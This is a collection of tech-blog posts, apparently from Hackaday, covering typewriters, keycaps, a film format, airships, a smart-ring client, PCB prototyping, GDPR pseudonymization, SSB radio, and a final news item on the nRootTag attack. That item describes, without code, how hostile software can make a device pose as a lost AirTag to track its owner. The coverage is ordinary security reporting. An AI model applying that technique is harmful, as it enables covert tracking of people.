How did that work? Well, each key changed the position of the linkages, moving the slug either up or down. The top row articulates the deepest, while the home row doesn’t move at all. Makes sense.
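The counting works out neatly: with one key per character, any scheme that pairs a type bar with one of eight shift depths covers the whole character set. An illustrative (entirely hypothetical) mapping:

```python
# 11 type bars x 8 slugs per bar covers all 88 printable characters
BARS, SLUGS = 11, 8

def slug_position(key_index: int) -> tuple[int, int]:
    # Hypothetical mapping: which bar swings, and which of the eight
    # vertical shift positions the linkage selects
    return key_index % BARS, key_index // BARS

# Every one of the 88 characters gets a unique (bar, shift) pair
positions = {slug_position(k) for k in range(BARS * SLUGS)}
```

The real machine, of course, encoded this mechanically in the linkage geometry rather than in any lookup.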
The Kanzler was designed by Paul Gruetzmann, and the Kanzler model 1B shown here hit the market in 1903. With the Kanzler line, Gruetzmann was trying to produce a machine that was faster and more stable than others. The company claimed that 200 WPM was technically achievable. Can you imagine typing that fast on your best day, on your favorite keyboard? No chording allowed! 😛
Finally, Some 3D-Printed Keycaps for the Kinesis Advantage
If you’re a Kinesis Advantage owner, one of the first things you notice is that you might not really like the ABS keycaps and will probably want something different. But then you find out that although you can get fun keycap sets in ergo layouts, they’re never going to be contoured like the factory set, and that’s something you’ll have to get used to, which, in my opinion, degrades the Kinesis experience. Right now, it seems like the best option is to just print your own.
Image by [SimplifyAndAddCoffee] via reddit
And here are the files. If you’re wondering about E, that is the original Maltron layout where this whole idea of the concave curvy girl got its start.
According to [SimplifyAndAddCoffee], these lovely keycaps were printed in Siraya Tech Blue Obsidian Black resin on an MSLA printer.
After printing, those inset legends were filled with white epoxy putty. [SimplifyAndAddCoffee] then scraped away the excess and completed the process by wiping them all with an isopropyl alcohol-soaked rag.
Personally, I suffer with the original ABS caps on my daily driver Kinesis, but my go-somewhere board has blank PBT caps for ultimate intrigue. I’d love to have a set of printed ones, but I’d have to have them made somewhere since I don’t have any type of resin printer around.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
DK 9x20 - Escaping the Cloud
Is there an alternative to the US cloud, now that everyone is discovering the Americans are neither allies nor trustworthy? Yes? No? The right answer is no. But it’s the question that’s wrong.
spreaker.com/episode/dk-9x20-f…
It’s 2025, and Here’s a New Film Format
We love camera hacking here at Hackaday, and it’s always fascinating to see new things being done in photography. Something rather special has come our way from [Camerdactyl], who hasn’t merely made a camera; instead, he’s created an entirely new analogue film format. Move over 35mm and 120, here’s the RA-4 cartridge!
RA-4 is the colour print chemistry many of you will be familiar with from your holiday snaps back in the day. Normally a negative image is projected onto it from the negative your camera took, and the positive image is developed on the paper as the reverse of that. It can also be developed as a reversal process similar to slide film, in which the negative image is developed and bleached away leaving an unexposed positive image, which can then be exposed to light and developed to reveal a picture. This means that with carefully chosen colour correction filters it can be shot in a camera to make normal colour prints with this reversal process.
The new film format is a 3D printed cartridge system holding a long roll of RA-4 paper, which slots into a back for standard 5 by 4 inch cameras. He’s also made a modular developing machine for the process, and can get over 100 shots on a roll. A portion of the video below deals with how he wants to release it; since it has taken a huge amount of development resources he intends to release the files to the public in stages as he reaches sales milestones with his work. It’s an unusual strategy that we hope works for him, though we suspect that many camera hackers would be prepared to pay him directly for the files.
Either way, it’s a reminder that there’s still plenty of fun to be had with analogue film, and also that reversal development of RA-4 is possible. Some of us here at Hackaday have been known to hack a few cameras, we guess it’s another one to add to the “one day” list.
youtube.com/embed/PB0GPYUDBCM?…
Thanks [Chuck] for the tip!
LTA’s Pathfinder 1: the Dawn of a New Age of Airships?
Long before the first airplanes took to the skies, humans had already overcome gravity with the help of airships. Starting with crude hot air balloons, the 18th century saw the development of more practical dirigible airships, including hydrogen gas balloons. On 7 January 1785, the French inventor and gas balloon pioneer Jean-Pierre Blanchard crossed the English Channel in such a hydrogen gas balloon, a trip that took a mere 2.5 hours. Despite the primitive propulsion and steering options available at the time, this provided continued inspiration for new inventors.
With steam engines being too heavy and cumbersome, it wasn’t until the era of internal combustion engines a century later that airships began to develop into practical designs. Until World War 2 it seemed that airships had a bright future ahead of them, but amidst a number of accidents and the rise of practical airplanes, airships found themselves mostly reduced to the not very flashy role of advertising blimps.
Yet despite popular media having declared rigid airships such as the German Zeppelins to be dead and a figment of a historic fevered imagination, new rigid airships are being constructed today, with improvements that would set the hearts of 1930s German and American airship builders aflutter. So what is going on here? Are we about to see these floating giants darken the skies once more?
A Simple Concept
Both balloons and airships are a type of aerostat, meaning an aircraft that is lighter than air and thus capable of sustained buoyancy. Much like a ship or a submarine, it uses this buoyancy to establish equilibrium with the surrounding air and thus maintain its position. In order to change their buoyancy, ships and submarines have ballast tanks, while airships can use mechanisms such as a ballonet. These are air-filled bags inside the outer envelope, which is filled with a lifting gas. Inflating the ballonet with more air, or deflating it, thus changes the buoyancy of the airship.
In the case of rigid airships like Zeppelins the concept of ballonet is somewhat reversed, in that the outer envelope contains air, while the lifting gas is inside gas bags attached to the upper part. If the rigid airship changes altitude using dynamic lift (i.e. using its propulsion and control surfaces), or by dropping ballast, the air pressure inside this outer envelope drops and the gas bags expand, which reduces the volume of air inside the outer envelope and thus adjusts the buoyancy.
This property makes both non-rigid (i.e. blimps, with ballonets) and rigid airships very stable platforms in most conditions with no real range limit beyond the fuel and food capacity for respectively the engines and onboard crew & passengers.
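To put rough numbers on that equilibrium, here’s a minimal lift calculation assuming sea-level densities:

```python
RHO_AIR = 1.225      # kg/m^3, sea-level air
RHO_HELIUM = 0.1786  # kg/m^3, helium at the same conditions

def gross_lift_kg(gas_volume_m3: float) -> float:
    # Buoyant lift equals the mass of displaced air minus the mass of lifting gas
    return (RHO_AIR - RHO_HELIUM) * gas_volume_m3

# Roughly 1 kg of lift per cubic metre of helium...
per_m3 = gross_lift_kg(1.0)
# ...so a Hindenburg-scale 200,000 m^3 envelope lifts over 200 tonnes
hindenburg_class = gross_lift_kg(200_000)
```

Structure, engines, fuel, and crew all come out of that gross figure, which is why airship designers obsess over every kilogram.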
Why Airships Failed
The main issue with airships is that they are relatively large, and as a result cumbersome to handle, slow when moving, and susceptible to adverse weather conditions. The list of airship accidents on Wikipedia gives somewhat of an impression of the issues that airship crews had to deal with. Although there is some overlap with airplane accidents, unique to airships is their large size, which makes them susceptible to strong winds and gusts that can overpower the airship’s controls and cause a crash.
Comparison of the LZ 129 Hindenburg with a number of very large airplanes. (Source: Wikimedia)
Other accidents involved the loss of lifting gas or a conflagration involving hydrogen lifting gas. The fatal accident involving the LZ 129 Hindenburg is probably the event which is most strongly etched onto people’s minds here, although ultimately the cause of what came to be called the Hindenburg disaster was never uncovered. This accident is often marked as ‘the end of the airship era’, although that seems to be rather exaggerated in the light of continued use of airships throughout World War 2 and beyond.
What is undeniably true, however, is that the rise of airplanes during the first half of the 20th century provided strong competition for airships when it came to passenger and cargo transport. Workhorses like the Douglas DC-3 airplane came to define travel by air, while airships saw themselves reduced to mostly military, observational and commercial use where aspects like speed were less important than endurance.
Meanwhile, the much smaller and simpler non-rigid blimps remained a popular choice especially for stationary applications, ranging from advertising, military monitoring, and reconnaissance to recording platforms for televised sports matches. Effectively, airships didn’t go away; they just stopped being Hindenburg-sized giants.
A Fresh Try
Zeppelin NT D-LZZR during low level flight, 2003 (Credit: Hansueli Krapf, Wikimedia)
Despite this reduced image of airships in people’s minds, the allure of these gentle giants quietly moving through the skies never went away. Beyond flashes of nostalgia and simple tourism, multiple start-ups have or are currently trying to come up with new business models that would reinvigorate the airship industry.
Notable mentions here include the semi-rigid Zeppelin NT, the hybrid Airlander 10, and more recently LTA’s rigid Pathfinder 1, which as the name suggests is a pathfinder airship. Of these, the Zeppelin NT is the only one currently in production and flying. As a semi-rigid airship it doesn’t have the full supportive skeleton of a rigid airship, but instead only a singular keel. Ballonets are further used, as is typical of a non-rigid design. So far seven of these have been built, for purposes ranging from tourism and aerial photography to scientific studies.
The obvious advantage of a semi-rigid design is that it makes disassembling them for transport a lot easier. In comparison a hybrid airship like the Airlander 10 blends the airship design with that of an airplane by adding wings and other design elements which make it in many ways closer to a blended wing design, just with the ability to also float.
Unfortunately for the Airlander 10, it seems to be struggling to enter production since we last looked at it in 2021, with a tentative year of 2028 currently penciled in.
So in this landscape, what is the business model of LTA (Lighter Than Air), a company started and funded by Google co-founder Sergey Brin? As most recently reported by LTA, in October of 2024 they achieved the first untethered flight of Pathfinder 1. Construction of Pathfinder 1 incidentally took place in Hangar Two at Moffett Airfield, a WW2-era airship hangar that some people may recognize as one of the filming locations for MythBusters episodes.
Pathfinder 1 in Hangar 2 at Moffett Airfield. (Credit: LTA)
The rigid Pathfinder 1 uses many new technologies and materials, including titanium hubs and carbon fiber reinforced polymer tubes for the internal frame, LIDAR sensors and an outer skin made of laminated polyvinyl fluoride (PVF, trade name Tedlar). It also uses a landing gear adapted from the Zeppelin NT, with LTA having a working relationship with the company behind that airship.
Finally, it uses 13 helium bags made of ripstop nylon fabric with urethane coating, which should mean that leakage of the lifting gas is significantly less than with Hindenburg-era airships, which were originally designed to use helium as well. The use of titanium and carbon fiber also offer obvious advantages over the duralumin aluminium-copper alloy that was the peak of materials research in the 1930s.
From reading the press releases and the industry commentary on LTA’s efforts, it is clear that there’s no clear-cut business model yet, and that Pathfinder 1, along with the upcoming Pathfinder 3 – which will be one-third larger – is pretty much what the name says. As a start-up bankrolled by someone with very deep pockets, the immediate need to attract funding is less severe, which should allow LTA to trial multiple prototype airships as they figure out what does and does not work, including in terms of constructing these massive airships.
Perhaps, much like the humble hovercraft, which was overhyped last century before seemingly vanishing from public view by the late 90s, there is a niche even for these large rigid airships. Whether this will take the form of mostly tourist flights – perhaps something akin to cruise ships, but in the sky – or something more serious is hard to say.
Who knows, maybe the idea of a flying aircraft carrier like the 1930s-era USS Macon (ZRS-5) will be revived once more, after that humble airship’s impressive list of successes.
Cheap Hackable Smart Ring Gets a Command Line Client
Last year, we featured a super cheap smart ring – BLE, accelerometer, heart-rate sensor, and a battery, all in a tiny package that fits on your finger. Back when we covered it, we expected either reverse-engineering of the stock firmware, or development of a custom firmware outright. Now, you might be overjoyed to learn that [Wesley Ellis] has written a Python client for the ring’s stock firmware.
Thanks to the lack of any encryption whatsoever, you can simply collect the data from your ring – no pairing necessary – and [Wesley]’s work takes care of the tricky bits. So, if you want to start collecting data from this ring right now and integrate it into anything you want, such as your smart home or exoskeleton project, this client is enough. A few firmware secrets remain – for instance, the specific way the ring keeps track of day phases, or the SpO2 intricacies. But there’s certainly enough here for you to get started with.
This program will work as long as your ring uses the QRing app – should be easy to check right in the store listing. Want to pick up the mantle and crack open the few remaining secrets? Everything is open-source, and there’s a notepad that follows the OG reverse-engineering journey, too. If you need a reminder on what this ring is cool for, here’s our original article on it.
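To give a flavor of what consuming such a ring’s data looks like downstream of a client like this, here’s a minimal, stdlib-only sketch of parsing a BLE notification payload. The packet layout, field sizes, and packet-type byte below are entirely hypothetical placeholders, not the actual QRing protocol – the real framing lives in [Wesley]’s client.

```python
import struct
from dataclasses import dataclass

# Hypothetical packet layout -- NOT the real QRing protocol.
# Assumed here: 1 byte packet type, 2 bytes little-endian heart rate,
# 1 byte SpO2 percentage.

@dataclass
class RingReading:
    heart_rate_bpm: int
    spo2_percent: int

def parse_notification(payload: bytes) -> RingReading:
    """Decode one (hypothetical) vitals notification from the ring."""
    kind, bpm, spo2 = struct.unpack("<BHB", payload[:4])
    if kind != 0x01:  # assumed "vitals" packet type
        raise ValueError(f"unexpected packet type {kind:#x}")
    return RingReading(heart_rate_bpm=bpm, spo2_percent=spo2)

# A simulated notification as it might arrive over BLE:
reading = parse_notification(b"\x01\x48\x00\x62")
print(reading)  # RingReading(heart_rate_bpm=72, spo2_percent=98)
```

From here, shipping each `RingReading` into MQTT, a database, or that exoskeleton project is just plumbing.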
CNC Router and Fiber Laser Bring the Best of Both Worlds to PCB Prototyping
Jack of all trades, master of none, as the saying goes, and that’s especially true for PCB prototyping tools. Sure, it’s possible to use a CNC router to mill out a PCB, and ditto for a fiber laser. But neither tool is perfect; the router creates a lot of dust and the fiberglass eats a lot of tools, while a laser is great for burning away copper but takes a long time to burn through all the substrate. So, why not put both tools to work?
Of course, this assumes you’re lucky enough to have both tools available, as [Mikey Sklar] does. He doesn’t call out which specific CNC router he has, but any desktop machine should probably do since all it’s doing is drilling any needed through-holes and hogging out the outline of the board, leaving bridges to keep the blanks connected, of course.
Once the milling operations are done, [Mikey] switches to his xTool F1 20W fiber laser. The blanks are placed on the laser’s bed, the CNC-drilled through holes are used as fiducials to align everything, and the laser gets busy. For the smallish boards [Mikey] used to demonstrate his method, it only took 90 seconds to cut the traces. He also used the laser to cut a solder paste stencil from thin brass shim stock in only a few minutes. The brief video below shows the whole process and the excellent results.
In a world where professionally made PCBs are just a few mouse clicks (and a week’s shipping) away, rolling your own boards seems to make little sense. But for the truly impatient, adding the machines to quickly and easily make your own PCBs just might be worth the cost. One thing’s for sure, though — the more we see what the current generation of desktop fiber lasers can accomplish, the more we feel like skipping a couple of mortgage payments to afford one.
youtube.com/embed/XcUxZo-ayEY?…
GDPR: Protection or Illusion? The Problem of Pseudonymization
Article 4(5) of the GDPR reads as follows: “‘pseudonymisation’ means the processing of personal data in such a manner that the personal data can no longer be attributed to a specific data subject without the use of additional information, provided that such additional information is kept separately and is subject to technical and organisational measures to ensure that the personal data are not attributed to an identified or identifiable natural person.”
In recent years, growing attention to the protection of personal data has led to significant interest in fundamental approaches to guaranteeing privacy, especially in a context where personal information is increasingly collected and processed by organizations of every kind.
Pseudonymization and Anonymization
In recent years there has been significant interest in data pseudonymization and anonymization techniques. It is a common mistake to confuse these two methods of processing data; the distinction between them is subtle, yet profoundly important in procedures intended to make identifying a subject difficult, or even entirely impossible.
Both methods are governed by regulations such as the European Union’s General Data Protection Regulation (GDPR), which sets out guidelines on how personal data should be handled.
Specifically, pseudonymization is the process by which the identification of an individual is prevented by replacing the data subject’s direct identifiers with pseudonyms. Anonymization, on the other hand, involves the permanent removal of all identifying information, making it impossible to associate the data with any particular subject.
An Organic, Integrated Approach to Data Protection
Assuming that pseudonymization can be achieved with software alone is nevertheless risky; anonymity must be guaranteed on two distinct but interrelated operational fronts. The first, organizational in nature, must manage the value of the data, permanently decoupling it from the individual’s identity, while the second plays a supporting role, carrying out the relevant technical operations.
So why apply this measure at all?
The GDPR itself, in Recital 28, offers an explanation for its application: “The application of pseudonymisation to personal data can reduce the risks to the data subjects concerned and help controllers and processors to meet their data-protection obligations. The explicit introduction of ‘pseudonymisation’ in this Regulation is not intended to preclude any other measures of data protection.”
From this we can deduce an important point: pseudonymization is not meant to be applied in isolation, but to complement the full range of other data-protection security measures. In healthcare, as in finance, this measure matters both to the end user and to the company, which can continue to make use of the data even in pseudonymized form.
It is precisely here that the substantial difference with anonymization lies, the latter entailing the permanent removal of all identifying information. While anonymization offers a higher level of privacy protection, it can limit the usability of the data for future purposes. Naturally, pseudonymized data runs the risk of being reconstructed: as Recital 75 of the GDPR notes, “unauthorised reversal of pseudonymisation” can occur, which is why the principle of “decoupling” matters.
What decoupling consists of
Thanks to the many technologies available, and by exploiting the different privileges granted to each user, only the strictly necessary information is kept visible while the rest is masked.
The weak point of such a system lies in the application logic used to exchange the data presented to the end user. The application code must be solid, and security measures must be applied to the databases where the data are stored.
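As a toy illustration of this kind of privilege-based masking (a sketch, not taken from any real product; the role names and fields are invented), the idea boils down to filtering each record through the viewer’s privileges:

```python
# Minimal sketch of privilege-based field masking: each role sees only
# the fields it strictly needs; everything else is blanked out.
# Roles and field names here are purely illustrative.

VISIBLE_FIELDS = {
    "clinician": {"patient_id", "diagnosis", "medication"},
    "researcher": {"diagnosis", "medication"},   # no direct identifiers
    "billing": {"patient_id", "insurance_code"},
}

def mask_record(record: dict, role: str) -> dict:
    """Return a copy of the record with non-permitted fields masked."""
    allowed = VISIBLE_FIELDS.get(role, set())
    return {k: (v if k in allowed else "***") for k, v in record.items()}

record = {
    "patient_id": "P-1042",
    "diagnosis": "J45.0",
    "medication": "salbutamol",
    "insurance_code": "IT-889",
}
print(mask_record(record, "researcher"))
# {'patient_id': '***', 'diagnosis': 'J45.0', 'medication': 'salbutamol', 'insurance_code': '***'}
```

The masking must of course be enforced server-side, on top of hardened databases, or the decoupling is purely cosmetic.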
A common approach to pseudonymization is hashing, that is, transforming an input string into one of fixed length by means of cryptographic functions. This carries a risk: if the scheme is known, re-identification becomes possible. To guarantee security, the data controller must keep the details of the scheme used safe, making them inaccessible to unauthorized parties.
This segregation is essential to preserving the integrity of the process. Furthermore, to mitigate the risk of brute-force attacks or attacks using precomputed dictionaries, additional strategies must be adopted, such as salting – the addition of a random value to the input before hashing.
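A minimal sketch of this idea in Python, using only the standard library (the identifier and key here are illustrative). Rather than a bare salted hash, a keyed HMAC is used, since the key neatly plays the role of the “additional information” that the GDPR requires to be stored separately:

```python
import hashlib
import hmac
import secrets

# The secret key is the "additional information" that must be kept
# separately from the pseudonymized dataset.
SECRET_KEY = secrets.token_bytes(32)

def pseudonymize(identifier: str, key: bytes = SECRET_KEY) -> str:
    """Replace a direct identifier with a keyed pseudonym.

    HMAC-SHA256 rather than a bare hash: without the key, dictionary
    and brute-force attacks against common identifiers are infeasible.
    """
    return hmac.new(key, identifier.encode("utf-8"), hashlib.sha256).hexdigest()

alice = pseudonymize("alice@example.com")
# Same input + same key -> same pseudonym, so the data stays linkable...
assert alice == pseudonymize("alice@example.com")
# ...but it differs from a bare unsalted hash, which an attacker could
# precompute for common identifiers:
assert alice != hashlib.sha256(b"alice@example.com").hexdigest()
```

Losing the key turns the pseudonymized dataset, for all practical purposes, into an anonymized one – which is exactly the trade-off the article describes.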
Balancing Data Protection and Legitimate Use
Among the guidelines introduced we also find the concept of a “pseudonymization domain”. This defines the context in which data are treated as pseudonymized, distinguishing between two main configurations.
The internal domain, in which only certain operational units within an organization have access to the data, and the external domain, in which pseudonymized data are shared with outside parties. If those parties do not possess the information needed to reverse the pseudonymization, the data are, for them, anonymized in the proper sense.
A middle ground between pseudonymization and anonymization is the masking of specific pieces of information, thereby blocking access through logic built into the application and the database holding the data.
At present, the broad interpretation of the concept of “personal data” leads to a generalized application of the GDPR, even in situations where data undergo advanced de-identification processes. This creates significant burdens and risks, especially for startups and businesses, which often find themselves bearing high compliance costs or abandoning data-exploitation projects for fear of violating the regulation.
In a context where algorithms are constantly evolving and being updated, managing personal data becomes ever more complex and crucial. Pseudonymization and anonymization techniques must adapt to these dynamics, responding to emerging privacy and security challenges. As technology advances and data-processing capacity grows, it is essential to reflect on how these practices can guarantee effective protection for individuals. A balanced approach is therefore needed, one that considers both the need to protect individual privacy and the importance of using data for legitimate and useful purposes.
The article GDPR: Protection or Illusion? The Problem of Pseudonymization originally appeared on il blog della sicurezza informatica.
It’s SSB, But Maybe Not Quite As You Know It
Single sideband, or SSB, has been the predominant amateur radio voice mode for many decades now. It has traditionally been generated by analogue means: either generating a double-sideband signal and filtering away the unwanted side, or generating 90-degree phase-shifted quadrature signals and mixing them. More recent software-defined radios have moved this into the CPU, but here’s [Georg DG6RS] with another method. It uses SDR techniques and a combination of AM and FM to achieve polar modulation and generate SSB. He’s provided a fascinating in-depth technical explanation to help understand how it works.
The hardware is relatively straightforward: an SI5351 clock generator provides the reference for an ADF4351 PLL and VCO, which in turn feeds a PE4302 digital attenuator. It’s all driven from an STM32F103 microcontroller which handles the signal processing. Internally this means conventionally creating I and Q streams from the incoming audio, then running an algorithm to generate the phase and amplitude for polar modulation. These are fed to the PLL and attenuator respectively for FM and AM modulation, and the result is SSB. It’s only suitable for narrow bandwidths, but it’s a novel and surprisingly simple design.
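The maths behind the polar split is compact: the analytic (I/Q) form of the audio yields an envelope A(t) = √(I² + Q²) for the AM path and a phase φ(t) = atan2(Q, I) whose rate of change steers the PLL for the FM path. Here’s a rough numpy sketch of that decomposition on a test tone – an illustration of the principle, not [Georg]’s STM32 code:

```python
import numpy as np

def analytic_signal(x: np.ndarray) -> np.ndarray:
    """Analytic signal via FFT: zero out the negative frequencies."""
    N = len(x)  # assumed even
    X = np.fft.fft(x)
    h = np.zeros(N)
    h[0] = 1.0
    h[1:N // 2] = 2.0
    h[N // 2] = 1.0
    return np.fft.ifft(X * h)

fs = 8000.0
t = np.arange(1024) / fs
audio = np.cos(2 * np.pi * 1000.0 * t)   # 1 kHz test tone

z = analytic_signal(audio)               # I + jQ
amplitude = np.abs(z)                    # -> drives the attenuator (AM path)
phase = np.unwrap(np.angle(z))           # -> its slope steers the PLL (FM path)
inst_freq = np.diff(phase) * fs / (2 * np.pi)

print(round(float(amplitude.mean()), 3))  # ~1.0: constant envelope for a pure tone
print(round(float(inst_freq.mean()), 1))  # ~1000.0 Hz instantaneous frequency
```

For a single tone the envelope is flat and the instantaneous frequency constant; real speech makes both wiggle, which is why the attenuator and PLL must track quickly, and why the scheme only suits narrow bandwidths.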
We like being presented with new (to us at least) techniques, as it never pays to stand still. Meanwhile for more conventional designs, we’ve got you covered.
Hijacking AirTag Infrastructure To Track Arbitrary Devices
In case you weren’t aware, Apple devices around you are constantly scanning for AirTags. Now, imagine you’re carrying your laptop around – no WiFi connectivity, but BLE on as usual – and there’s a little bit of hostile code running at user privileges, say, in a third-party app. Turns out, it’s possible to make your laptop or phone pretend to be a lost AirTag – making it, and you, trackable whenever an iPhone is around.
The nRootTag website isn’t big on details, but the paper fills in plenty more; the attack does require a bit of GPU firepower, but nothing too out of the ordinary. The specific vulnerabilities making this possible have been patched in newer iOS and macOS versions, but it’s still possible to pull off as long as an Apple device with outdated firmware is nearby!
Of course, local code execution is often considered game over, but it’s pretty funny that you can do this while making use of Apple’s AirTag infrastructure, relatively unprivileged, and exfiltrate location data without any data connectivity whatsoever, all as long as an iPhone is nearby. You might also be able to exfiltrate other data, for what it’s worth – here’s how you can use AirTag infrastructure to track new letter arrivals in your mailbox!